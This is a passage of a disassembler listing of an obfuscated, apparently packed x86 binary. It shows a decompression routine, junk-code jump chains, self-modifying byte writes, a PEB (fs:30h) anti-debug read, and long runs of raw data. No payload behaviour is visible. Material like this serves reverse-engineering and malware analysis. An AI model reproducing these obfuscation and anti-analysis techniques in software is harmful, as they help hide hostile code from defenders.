		shl	ebp, cl
		call	sub_48946F
		or	eax, ebp
		pop	ebp
		mov	ebx, eax
		call	sub_48947B
		cmp	eax, 10000h
		jnb	short loc_489440
		cmp	eax, 37FFh
		jnb	short loc_489441
		cmp	eax, 27Fh
		jnb	short loc_489442
		cmp	eax, 7Fh
		ja	short loc_489443
		inc	ecx

loc_489440:				; CODE XREF: sub_48930E+11Cj
		inc	ecx

loc_489441:				; CODE XREF: sub_48930E+123j
		inc	ecx

loc_489442:				; CODE XREF: sub_48930E+67j
					; sub_48930E+12Aj
		inc	ecx

loc_489443:				; CODE XREF: sub_48930E+D5j
					; sub_48930E+F9j ...
		push	esi
		mov	esi, edi
		sub	esi, eax
		rep movsb
		pop	esi
		jmp	loc_48933F
; ---------------------------------------------------------------------------

loc_489450:				; CODE XREF: sub_48930E+19j
					; sub_48930E+DAj
		mov	eax, esi
		pop	esi
		pop	edi
		pop	ebx
		jmp	short loc_48948D
sub_48930E	endp


; =============== S U B	R O U T	I N E =======================================



sub_489457	proc near		; CODE XREF: sub_48930E+33p
					; sub_48930E:loc_489356p ...
		add	edx, edx
		jnz	short locret_489463
		mov	edx, [esi]
		add	esi, 4
		stc
		adc	edx, edx

locret_489463:				; CODE XREF: sub_489457+2j
		retn
sub_489457	endp


; =============== S U B	R O U T	I N E =======================================



sub_489464	proc near		; CODE XREF: sub_48930E:loc_489388p
					; sub_48930E+A8p
		mov	ecx, 8
		call	sub_48946F
		retn
sub_489464	endp


; =============== S U B	R O U T	I N E =======================================



sub_48946F	proc near		; CODE XREF: sub_48930E+3Dp
					; sub_48930E+5Fp ...
		xor	eax, eax

loc_489471:				; CODE XREF: sub_48946F+9j
		call	sub_489457
		adc	eax, eax
		loop	loc_489471
		retn
sub_48946F	endp


; =============== S U B	R O U T	I N E =======================================



sub_48947B	proc near		; CODE XREF: sub_48930E:loc_4893F8p
					; sub_48930E+F4p ...
		xor	ecx, ecx
		inc	ecx

loc_48947E:				; CODE XREF: sub_48947B+Fj
		call	sub_489457
		adc	ecx, ecx
		call	sub_489457
		jb	short loc_48947E
		retn
sub_48947B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48930E

loc_48948D:				; CODE XREF: sub_48930E+147j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_48930E
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_489492	proc near		; DATA XREF: sub_48F051o
					; sub_48F057+29o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048DB98 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	esi, 0BD475680h
		xchg	esi, [esp-4+arg_0]
		call	sub_48E778
		add	[edi-0D74DBECh], al
		push	eax
		mov	eax, (offset aHapzXbrMbASl+12h)
		jmp	loc_48DB98
sub_489492	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_4894B7	proc near		; CODE XREF: sub_48B559-1AFBj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048CC6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DA0F SIZE 0000000F BYTES

		push	ebx
		mov	ebx, offset nullsub_27
		jmp	loc_48CC6C
sub_4894B7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4894C2	proc near		; CODE XREF: sub_48CF7E-1C9Cj
					; sub_48CF7E:loc_48B4D4j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048C9FE SIZE 00000005 BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	loc_48D61B

loc_4894CD:				; CODE XREF: sub_48E839+Fj
		mov	eax, edx
		pop	edx
		and	eax, 4DA0022Ah
		xor	eax, 1200250h
		push	offset loc_48AE62
		jmp	loc_48C9FE
sub_4894C2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BE6F

loc_4894E6:				; CODE XREF: sub_48BE6F+8FFj
		xor	ecx, 6F88673Ch

loc_4894EC:				; CODE XREF: sub_48BE6F+8F7j
		push	offset sub_48A8BE
		jmp	loc_48E632
; END OF FUNCTION CHUNK	FOR sub_48BE6F
; ---------------------------------------------------------------------------
		dw 8700h
; ---------------------------------------------------------------------------
		adc	al, 24h
		pop	edx
		popf

loc_4894FC:				; DATA XREF: eu81y7qg:0048DB51o
		mov	dword ptr [edx], 1000h
		jmp	loc_48A650
; ---------------------------------------------------------------------------
		align 4
		dd 300C600h, 48D2E968h,	344CE900h, 87C30000h, 895B241Ch
					; CODE XREF: eu81y7qg:0048B666j
					; sub_48DE75+1005p
		dd 7EE95901h, 0F000011h, 197385h, 0C5D10000h, 3063E9h
		dd 68000000h, 4A51AC95h, 0C3E88158h, 0F5D1B2Ch,	0FB485h
		dd 0E9000000h, 3C31h, 0AAE99D00h, 2Dh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C693

loc_489554:				; CODE XREF: sub_48C693+Aj
		pop	esi
		sub	esi, 0EB72F4C9h
		add	esi, 6714905Ch
		sub	esi, 88938F04h
		push	ecx
		jmp	loc_48E483
; END OF FUNCTION CHUNK	FOR sub_48C693
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd offset dword_421284+6
		dd 24148700h, 0CCF1685Ah, 0EBE90048h, 1, 0C300h, 5249C181h
		dd 879D8851h, 0AEE9240Ch, 46h, 0E9138900h, 41Bh, 97706800h
		dd 0BE90048h, 4Dh, 0ACCE8100h, 0F1B3988h, 4A4880h, 222FE900h
		dd 0
; ---------------------------------------------------------------------------
		sub	ecx, edi
		sbb	eax, 772C25E3h
		jmp	sub_48B258
; ---------------------------------------------------------------------------

loc_4895CD:				; CODE XREF: eu81y7qg:loc_48E926j
		add	ebx, 46DAAE7h
		xchg	ebx, [esp]
		jmp	loc_48B473
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		call	sub_48A96A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_599. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; START	OF FUNCTION CHUNK FOR sub_48EB80

loc_4895E8:				; CODE XREF: sub_48EB80:loc_48C342j
		jmp	sub_48D725
; END OF FUNCTION CHUNK	FOR sub_48EB80
; ---------------------------------------------------------------------------
		align 2
		jno	loc_48A1D5
		jnz	loc_48B244
		mov	eax, large fs:30h
		push	edx
		jmp	loc_48B49A
; ---------------------------------------------------------------------------
		align 4
		dd 2C830F00h, 87000029h, 6859240Ch, 0D6AFF1C7h,	4337E958h
		dd 68500000h, 489E56h, 29AEE9h,	52000000h, 515C2068h, 0CA815A72h
		dd 44F19D12h, 0C722C281h, 0C2038675h, 5799E9h, 68510000h
		dd 99102454h, 0BB64BA52h, 0A6E90048h, 53000040h, 2E77E8h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_477. PRESS KEYPAD	"+" TO EXPAND]
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48A8BE

loc_489660:				; CODE XREF: sub_48A8BE+738j
		jmp	loc_48B70D
; END OF FUNCTION CHUNK	FOR sub_48A8BE
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh	; CODE XREF: sub_48DE75:loc_48E06Aj
		dd 141E8Dh, 0E9188900h,	140Ch, 860F0000h, 0FFFFFFD1h, 5B241C87h
		dd 598701C6h, 1B01E850h, 0E9000000h, 6DCh, 1E87E9h, 0F000000h
		dd 8E782h, 243C8700h, 0C9E9515Fh, 49h, 0E3819D00h, 52EEFB67h
		dd 105AE9h, 33000000h, 4C31E9F9h, 0C2810000h, 7B14B736h
		dd 30AFE9h, 87000000h, 875E2434h, 0C8C12414h, 190FE91Ch
		dd 0F3810000h, 0EE418F2Bh, 0D1DFBF57h, 7E90048h, 41h, 0B8E7B951h
		dd 9BE90048h, 5, 87241487h, 0D78B243Ch,	0BE00685Fh, 8158FA6Ah
		dd 3515ACF0h, 4947E97Bh, 8BC30000h, 241C871Bh, 0C0BC15FFh
		dd 0C2890045h, 1117E8h,	28E4E900h, 0F7000000h, 55D8E9D5h
		dd 815F0000h, 7BD1B2C7h, 0BFE78135h, 813306F0h,	1897E2F7h
		dd 5FC73B87h, 3FB7E9h, 0E8000000h, 3440h, 3F90E9h, 34875F00h
		dd 0C015FF24h, 560045C0h, 5BE9F28Bh, 17h, 0C3C300h, 589D00C6h
		dd 754BE281h, 0EA8146ADh, 1EB15EF8h, 1B50F281h,	0AEE98C35h
; ---------------------------------------------------------------------------
		cmp	al, 0
		add	[edi-3A74DBD4h], al ; DATA XREF: sub_48A96A+9o
		pop	ebp
		push	ecx
		mov	ecx, offset loc_48A107
		jmp	loc_48A056
; ---------------------------------------------------------------------------
		dd 34870000h, 0C3815E24h, 612F33CFh, 3A29E8h, 0BB530000h
		dd 48A446h, 3338E9h, 7FC68100h,	810DC412h, 0FA01C2F6h
		dd 47C68100h, 81001A89h, 6F2CF3F6h, 34A2E8EEh, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_566. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_4897D9:				; CODE XREF: sub_48DE75+592j
		jmp	loc_48ADDD
; ---------------------------------------------------------------------------

loc_4897DE:				; CODE XREF: sub_48DE75+9Dj
		jmp	loc_48BF4E
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------

loc_4897E3:				; CODE XREF: eu81y7qg:0048AC16j
		jmp	locret_48AE2C
; ---------------------------------------------------------------------------
		dd 0F2030000h		; CODE XREF: eu81y7qg:0048D0AEj

; =============== S U B	R O U T	I N E =======================================



sub_4897EC	proc near		; CODE XREF: sub_48C067+10p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	ebx, 7C2C0851h
		add	eax, ebx
		xchg	edi, [esp-4+arg_0]
		mov	ebx, edi
		pop	edi
		jmp	loc_48EECE
sub_4897EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489803:				; CODE XREF: sub_48DE75+DD2j
		sub	edi, 0DA3D7E38h
		jb	loc_48BD22
		add	[ebx], dl
		inc	byte ptr [ebx]
		sti
		jmp	loc_48BD22
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48981A:				; CODE XREF: sub_48DE75:loc_48E4DFj
		push	ecx
		mov	ecx, offset word_48B216
		jmp	loc_48C1C7
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 2

loc_489826:				; CODE XREF: eu81y7qg:0048BC5Fj
		xchg	ebx, [esp]
		push	offset loc_48D1BE
		jmp	locret_48A811
; ---------------------------------------------------------------------------
		align 4

loc_489834:				; CODE XREF: eu81y7qg:loc_48EBB0j
		call	sub_48CE11
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		db 0ACh	; ¬
		db  3Bh	; ;
		db    0
		db    0
		db    0
		db    0
		db 0E9h	; é
		db  2Eh	; .
		db  1Ah
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------

loc_489849:				; CODE XREF: eu81y7qg:0048EA9Ej
		jnz	loc_48D0BB
		adc	ebp, esi
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_489851:				; CODE XREF: sub_48AEB5+3BD3j
		rol	eax, 1Ah
		add	eax, 100806Ch
		push	esi
		pushf
		push	6ECDE6FAh
		jmp	loc_48C733
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489868:				; CODE XREF: sub_48DE75:loc_48BA82j
					; eu81y7qg:0048EAF6j
		jz	loc_4899CC
		test	edi, esi
		jmp	loc_48E3B2
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
; ---------------------------------------------------------------------------
		cmp	al, 24h
		pop	edi
		push	offset loc_489EF2
		jmp	loc_489C61
; ---------------------------------------------------------------------------

loc_489885:				; CODE XREF: eu81y7qg:0048C610j
		xchg	edi, [esp]
		mov	ecx, edi
		xchg	edx, [esp]
		mov	edi, edx
		pop	edx
		jmp	loc_48B032
; ---------------------------------------------------------------------------
		db 2 dup(0), 0F7h
		dd 1F3F4CC6h, 0FCCDE93Eh, 0FFFFh, 58240487h, 0C081C503h
		dd 9DCA1BBDh, 4E3008Bh,	10A7E924h, 87000000h, 0F7BF2434h
		dd 0E90048CCh, 3DD2h, 8C0F0000h, 3C5Dh,	3388E900h, 0F000000h
		dd 0FFFD0B82h, 3C48E9FFh, 0FE330000h, 16A6E9h, 0EC840F00h
		dd 2Fh,	0CF81D3F7h, 25280AF8h, 0E9004D89h, 2FD3h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_565. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_489901:				; CODE XREF: eu81y7qg:0048A668j
					; DATA XREF: sub_48CB88:loc_48A65Eo
		call	sub_48D58F
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CAC2

loc_489908:				; CODE XREF: sub_48CAC2+3j
		jmp	loc_48C19D
; END OF FUNCTION CHUNK	FOR sub_48CAC2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_604. PRESS KEYPAD	"+" TO EXPAND]
		dw 8100h
		dd 0A9859BCEh, 17EE817Ch, 8162B583h, 7399F4F6h,	8DEE8128h
		dd 81C17725h, 863CA6C6h, 3B01E98Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_489932:				; CODE XREF: sub_48B258:loc_48A876j
		jz	loc_48EC6E
		add	cl, ch
		js	short loc_489949
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		dd 0
		dd 8668EE23h, 0E9552B3Bh
		db 22h
; ---------------------------------------------------------------------------

loc_489949:				; CODE XREF: sub_48B258-191Ej
		push	ebx
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		adc	esi, 0F09E834Dh
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489952:				; CODE XREF: sub_48DE75:loc_48C4BDj
		or	ebx, 1850FF33h
		add	ebx, 0EDEBDBD9h
		add	esi, ebx
		pop	ebx
		call	sub_48CB88
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489968:				; CODE XREF: sub_48DE75+704j
		jmp	nullsub_614
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48EA14

loc_48996E:				; CODE XREF: sub_48EA14+Bj
		call	sub_48B559
		add	cl, ch		; CODE XREF: sub_48D511+11A6j
		out	dx, eax
		or	al, 0
		add	bl, al		; CODE XREF: sub_48B769+Bj
		add	[ecx-62641509h], al
		pusha
		cmp	edi, 0E188A0DDh
		jmp	loc_48EE87
; END OF FUNCTION CHUNK	FOR sub_48EA14
; ---------------------------------------------------------------------------
		sub	edi, 6CC5D0B9h
		test	edi, 800000h
		jmp	loc_48EA3D
; ---------------------------------------------------------------------------
		db 0Fh,	85h, 49h
		dd 64000022h, 30058Bh, 0C0830000h, 4C2EE854h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_4899B4:				; CODE XREF: sub_48DE75+337j
		jmp	nullsub_606
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd 553A1031h, 48D9EF68h, 253E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A70F

loc_4899CB:				; CODE XREF: sub_48A70F:loc_48B0ABj
		pop	eax

loc_4899CC:				; CODE XREF: sub_48DE75:loc_489868j
		or	eax, 0FF800786h
		push	offset sub_48D1F9
		jmp	loc_48C649
; END OF FUNCTION CHUNK	FOR sub_48A70F
; ---------------------------------------------------------------------------
		dd 8B240487h, 6E858F0h,	1Eh, 527FE9h, 0E9000000h, 0FFFFFCC3h
					; CODE XREF: sub_48EDBB+Aj
		dd 0BDE900h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_4899FA:				; CODE XREF: sub_48AEB5:loc_48AEC1j
		call	sub_48E9EE
		add	dh, al
		add	[edi], cl
		xchg	esi, [esp+0]
		mov	eax, esi
		pop	esi
		jmp	loc_48E89C
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		push	esi
		push	12524B3Dh
		pop	esi
		add	esi, 0FD9FEE54h
		and	esi, 10BB50D3h
		or	esi, 730D86E4h
		and	esi, 0F9C910D7h
		jmp	loc_48D3C4
; ---------------------------------------------------------------------------

loc_489A32:				; DATA XREF: eu81y7qg:0048C148o
		mov	byte ptr [edx],	0F6h
		pop	edx
		add	esi, 0F3E0BA4h
		push	offset byte_48A731
		jmp	locret_489BF1
; ---------------------------------------------------------------------------

loc_489A46:				; DATA XREF: eu81y7qg:0048B1DBo
		xor	edx, eax
		push	offset byte_48B75D
		jmp	loc_48B8C6
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_489A53:				; CODE XREF: sub_48C117+4j
					; sub_48C117+11EFj
		jmp	loc_48A4C8
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_489A58:				; CODE XREF: sub_48DE75:loc_489C74j
					; sub_48B559+4B8j
		xchg	ebp, [esp+0]
		mov	ecx, ebp
		pop	ebp
		jmp	sub_4894B7
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
		align 4
		dd 840F5D00h, 1EFBh, 3B62850Fh,	5FE90000h, 27h,	73E06800h
		dd 81592288h, 8D853DE9h, 30E181AAh, 0E81B62A6h,	1AEFh
		dd 0DB810000h, 6434D3B0h, 5B241C87h, 90346852h,	505AFCB5h
		dd 16C3E9h, 0B9510000h,	48C5DAh, 5288E9h, 0C3000000h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_489AB9:				; CODE XREF: sub_48C117:loc_48D2FDj
					; sub_48DE75+365j
		jmp	loc_48DE0D
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
		dw 0E900h		; CODE XREF: sub_48B80F-1FFj
		dd 5020h, 87F38B56h, 3EBB2434h,	0E90048CBh, 276Ch, 0B4E9EB13h
		dd 3Ah
		db 0, 0C3h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE11

loc_489ADF:				; CODE XREF: sub_48CE11+Bj
		jmp	loc_48AFB7
; END OF FUNCTION CHUNK	FOR sub_48CE11
; ---------------------------------------------------------------------------
		dd 0F8DC6800h, 815BEAB8h, 216227CBh, 2EEFE921h,	0
; ---------------------------------------------------------------------------

loc_489AF8:				; CODE XREF: eu81y7qg:loc_48B113j
		xor	eax, 0C2694785h
		add	eax, 33CFA87Dh
		add	eax, 1000h
		push	offset loc_48A2B5
		jmp	locret_48E2B5
; ---------------------------------------------------------------------------
		align 4
		add	esi, 494135A7h
		push	offset loc_48EC28
		jmp	locret_48A356
; ---------------------------------------------------------------------------
		jns	loc_48E54A
		xchg	edi, [esp]
		pop	edi
		add	edi, 5862C4F2h
		xchg	edi, [esp]
		jmp	loc_48AD2F
; ---------------------------------------------------------------------------
		dd 34870000h, 241C8724h, 685BF38Bh, 87A22766h, 9DC6815Eh
					; CODE XREF: sub_48DE75-181Bp
		dd 81E39C68h, 7B81A4CEh, 0FFB6E92Dh, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489B60:				; CODE XREF: sub_48DE75-1F21j
		adc	edi, ebx
		jmp	loc_48CE0C
; ---------------------------------------------------------------------------

loc_489B67:				; CODE XREF: sub_48DE75+38Dj
		mov	byte ptr [esi],	8Bh
		pop	esi
		push	0AB846C43h
		pop	ebx
		sub	ebx, 0EF927C35h
		xor	ebx, 0A49D85B9h
		sub	ebx, 6929E4FEh
		cmp	ebx, 8C3A833Dh

loc_489B89:				; CODE XREF: eu81y7qg:loc_48D338j
		jmp	loc_48C7F7
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dw 15FFh
		dd offset dword_45C0C0
		dd 87E88B55h, 68242Ch, 0E83AFE74h, 2348h, 0C1810000h, 6B205BE0h
		dd 5E243487h, 4A59C103h, 0E9C00900h, 0Ch
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_614. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0E9h	; CODE XREF: eu81y7qg:0048DB56j
		dd 1EEFh, 0C30000h, 367BE9h, 0C30000h, 16EFE900h, 0
					; CODE XREF: sub_48DE75+5DFj
		dd 0FFFFE9E9h, 0FDE900FFh, 1B000013h, 56C2F7F0h, 0E949D89Fh
		dd 831h
		db 0
; ---------------------------------------------------------------------------

locret_489BF1:				; CODE XREF: eu81y7qg:00489A41j
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_598. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 4BF8E900h, 0
; ---------------------------------------------------------------------------

loc_489BFC:				; CODE XREF: eu81y7qg:0048A045j
		jmp	loc_48A751
; ---------------------------------------------------------------------------
		db 2 dup(0), 55h
; ---------------------------------------------------------------------------
		push	edi
		mov	edi, offset word_48BB2E
		jmp	loc_48BE47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48EA14

loc_489C0F:				; CODE XREF: sub_48EA14:loc_48EE87j
		jge	loc_48E3A0
; END OF FUNCTION CHUNK	FOR sub_48EA14
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h	; CODE XREF: eu81y7qg:0048D1E1j
		dd 4C69h, 44A2E900h, 0D9870000h, 0D585D80Bh, 476DE9h, 0F00C300h
		dd 0B8980h, 243C8700h, 0E6E99C5Fh, 29h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489C41:				; CODE XREF: sub_48DE75-358Bj
		mov	byte ptr [esi],	87h
		pop	esi
		xor	eax, 2A06C45Dh
		or	eax, 1813AB90h
		call	sub_48CA73

loc_489C56:				; CODE XREF: sub_48DE75-118Bj
		jmp	loc_48E31B
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------

loc_489C5B:				; CODE XREF: eu81y7qg:0048A7AAj
		jmp	loc_48A7BD
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_489C61:				; CODE XREF: eu81y7qg:00489880j
		jmp	near ptr dword_489574+11h
; ---------------------------------------------------------------------------
		adc	edx, ecx
		jmp	loc_48E269
; ---------------------------------------------------------------------------
		xchg	ecx, edx
		jmp	loc_48BAFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489C74:				; CODE XREF: sub_48DE75+636j
		jl	loc_489A58
		add	eax, 0EC24BD51h
		jmp	near ptr sub_48DE75
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 59h	; CODE XREF: sub_48C97D+Ej
; ---------------------------------------------------------------------------
		pop	ebp
		xor	eax, eax

loc_489C8B:				; DATA XREF: sub_48DE75+3Fo
		adc	[eax], eax
		jmp	loc_48CBC8
; ---------------------------------------------------------------------------
		jmp	loc_48B8DD
; ---------------------------------------------------------------------------
unk_489C97	db  64h	; d		; DATA XREF: sub_48DE75-3D01o
		db  8Fh	; 
		db    5
		db    0
		db    0
		db    0
		db    0
		db  83h	; ƒ
		db 0C4h	; Ä
		db    4
		db 0E9h	; é
		db  10h
		db  52h	; R
		db    0
		db    0
		dw 5700h
; ---------------------------------------------------------------------------
		mov	edi, offset loc_48D500
		jmp	loc_48ED01
; ---------------------------------------------------------------------------
		align 4
		shr	ebp, 18h
		mov	ebx, [edx]
		jmp	loc_48D0B3
; ---------------------------------------------------------------------------
		dw 8100h
		dd 701508D5h, 13C2E9D7h, 0
; ---------------------------------------------------------------------------
		push	offset byte_48BDC7
		jmp	locret_48C960
; ---------------------------------------------------------------------------
		dw 0C100h
		dd 0DB811FEFh, 834A5EA6h, 4A38E9h, 7C60000h, 0E4BB5F03h
					; CODE XREF: eu81y7qg:loc_48BEE6j
		dd 0E90048CAh, 256h, 0E9C18500h, 50CFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A895

loc_489CFC:				; CODE XREF: sub_48A895+Bj
		push	edi
		mov	edi, ebx
		push	offset dword_48D71C

loc_489D04:				; CODE XREF: sub_48DE75:loc_48E3DFj
		jmp	loc_48C0D7
; END OF FUNCTION CHUNK	FOR sub_48A895
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h	; CODE XREF: eu81y7qg:0048EC7Ej
		dd offset loc_48AD03
; ---------------------------------------------------------------------------
		jmp	loc_48E9B2
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48E778

loc_489D16:				; CODE XREF: sub_48E778+16j
		add	eax, 0D80FF6BAh
		xchg	eax, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_48E778
; ---------------------------------------------------------------------------
		dd 108B0000h, 0E9D78B52h, 0A50h, 0E0810000h, 5278D85Bh
					; CODE XREF: sub_48CCBC+677j
		dd 0E2C6F081h, 0C8818981h, 5E380DF0h, 6B0DF081h, 0C0812E30h
		dd 0E76BB57h, 48D41868h, 0D6AE900h, 0
; ---------------------------------------------------------------------------

loc_489D58:				; CODE XREF: eu81y7qg:0048C451j
		popf
		push	ebx
		jg	sub_48CF7E
		adc	edi, 0F303D4D9h
		jmp	loc_48DC95
; ---------------------------------------------------------------------------
		align 4
		xor	edi, 0D9EF1F6Dh
		add	edi, ecx
		add	edi, 495C4792h
		mov	[edi], eax
		jmp	loc_48CAA1
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
		dd 0D3917EE6h
; ---------------------------------------------------------------------------
		cmpsb

; =============== S U B	R O U T	I N E =======================================



sub_489D89	proc near		; CODE XREF: sub_48DE75-22E9p
		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, 2985BB8h
		jmp	loc_48DED6
sub_489D89	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_489D9A:				; DATA XREF: sub_48C515:loc_48B82Eo
		mov	byte ptr [ebx],	8Ah
		pop	ebx
		rol	eax, 1Eh
		or	eax, 0FB1393C8h
		call	loc_48E854
		jmp	loc_48C99D
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_489DB3:				; DATA XREF: sub_48DE75+7C8o
		pop	edi
		push	ebx
		pushf
		push	9DC351CEh
		pop	ebx
		or	ebx, 7C435031h
		jmp	loc_48AD29
; ---------------------------------------------------------------------------
		align 4
		and	esi, 0D12C64h
		add	esi, 0FFC899DDh
		xchg	esi, [esp]
		jmp	loc_48D217
; ---------------------------------------------------------------------------
		dd 4C8B5100h, 1FE81024h, 2Eh, 0FC00900h, 97D85h, 396DE800h
		dd 0
; ---------------------------------------------------------------------------
		call	sub_48EDBB
; START	OF FUNCTION CHUNK FOR sub_48ED10

loc_489DFD:				; CODE XREF: sub_48ED10+Aj
		pushf
		push	5B7CED3Bh
		xchg	edx, [esp+8+var_8]
		mov	ebx, edx
		pop	edx
		jmp	loc_48A6C0
; END OF FUNCTION CHUNK	FOR sub_48ED10
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_478. PRESS KEYPAD	"+" TO EXPAND]
		db  87h	; ‡
		db  0Ch
		db  24h	; $
		db  59h	; Y
		db 0C6h	; Æ
		db    3
		db  8Bh	; ‹
		db  5Bh	; [
		db 0C1h	; Á
		db 0C0h	; À
		db    5
		db  81h	; 
		db 0E0h	; à
		db  0Ah
		db 0ADh	; ­
		db  53h	; S
		db 0BDh	; ½
		db 0E9h	; é
		db  95h	; •
		db  2Bh	; +
		db    0
		db    0
		dw 875Fh
		dd 0C65B241Ch, 0F7E98703h, 3300003Eh, 94E9D9h, 1C60000h
		dd 0CE81590Fh, 6128BA07h, 9441C681h, 0CE8136F1h, 9FCF3042h
		dd 0FFFE38E9h, 976800FFh, 58B6CB5Ah, 0EE84E081h, 0E8813739h
		dd 0C1AF52DBh, 0F164E081h, 0F081964Bh, 0EBB60EDFh, 0E9240487h
		dd 4BB9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_489E7E:				; CODE XREF: eu81y7qg:0048A760j
		rol	edi, 1
		add	edi, 93863927h
		popf
		xchg	edi, [esp]
		retn
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48CA30

loc_489E8C:				; CODE XREF: sub_48CA30+8j
		jmp	loc_48A643
; END OF FUNCTION CHUNK	FOR sub_48CA30
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E8h	; CODE XREF: eu81y7qg:loc_48C503j
		dd 2A0Fh, 0EEE90000h, 0E900003Bh, 3782h, 8C0F0000h, 8E1h
